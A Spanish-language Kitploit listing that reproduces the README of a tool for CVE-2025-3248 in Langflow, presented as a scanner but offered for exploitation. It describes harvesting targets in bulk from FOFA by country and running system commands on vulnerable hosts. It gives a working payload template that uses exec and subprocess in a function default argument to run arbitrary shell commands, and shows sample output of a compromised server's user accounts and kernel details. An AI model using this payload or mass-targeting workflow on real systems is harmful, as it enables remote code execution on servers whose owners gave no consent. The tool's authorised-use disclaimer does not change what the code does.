Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3248 — Un escáner de vulnerabilidades para CVE-2025-3248 en aplicaciones Langflow. | Kitploit
Herramientas/GitHubGitHub/xuemian168/cve-2025-3248
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónComando y Control
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Un escáner de vulnerabilidades para CVE-2025-3248 en aplicaciones Langflow.

Ver Repositorio
102hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

中文 | English

Escáner de Vulnerabilidades Langflow

Un escáner de vulnerabilidades para CVE-2025-3248 en aplicaciones Langflow.

Características

  • Escanear un solo objetivo o múltiples objetivos usando FOFA
  • Ejecutar comandos del sistema en objetivos vulnerables
  • Obtener información del sistema
  • Soporte para payloads personalizados
  • Barra de progreso para escaneo FOFA
  • Interfaz CLI atractiva

Instalación

  1. Clonar el repositorio:
root@kitploit:~
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. Instalar dependencias:
root@kitploit:~
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. Editar el archivo de entorno (opcional)
root@kitploit:~
# Después de terminar de editar
mv .env.example .env

Uso

Escaneo de un solo objetivo

root@kitploit:~
python main.py -t https://target.com

Usando la API de FOFA

root@kitploit:~
python main.py --fofa-email [email protected] --fofa-key your_api_key

Opciones adicionales

  • -t, --target: URL objetivo a escanear
  • --fofa-email: Correo electrónico de la API de FOFA
  • --fofa-key: Clave de la API de FOFA
  • --fofa-query: Consulta de búsqueda FOFA (por defecto: 'app="LOGSPACE-LangFlow"')
  • --country: Filtrar resultados por código de país (p. ej., CN, US)
  • --max-pages: Número máximo de páginas FOFA a recuperar (por defecto: 5)
  • --page-size: Resultados por página (por defecto: 100)
  • --timeout: Tiempo de espera de solicitud en segundos (por defecto: 10)
  • --no-verify: Deshabilitar verificación SSL
  • --threads: Número de hilos para escaneo concurrente (por defecto: 5)
  • -f, --file: Archivo Python personalizado para usar como payload

Payloads personalizados

Puedes crear payloads personalizados creando un archivo Python:

root@kitploit:~
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

Luego úsalo con:

root@kitploit:~
python main.py -t https://target.com -f your_payload.py

Ejemplo de salida

root@kitploit:~
    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
root@kitploit:~
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

Descargo de responsabilidad

⚠️ Descargo de responsabilidad Esta herramienta es solo para fines legales. Está diseñada para fines educativos, pruebas de seguridad internas de la empresa o uso en entornos autorizados. Está estrictamente prohibido usar esta herramienta en cualquier sistema, red o dispositivo no autorizado; de lo contrario, puede violar las leyes y regulaciones aplicables.

Los usuarios asumirán todas las responsabilidades legales por sus acciones. El autor y los colaboradores no son responsables de ninguna pérdida, filtración de datos o consecuencias legales derivadas del uso inadecuado de esta herramienta.

⚠️ No usar para ataques ilegales. No intentar implementar o ejecutar esta herramienta en sistemas no autorizados.

Referencias

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

Licencia

Licencia MIT

Descargar herramienta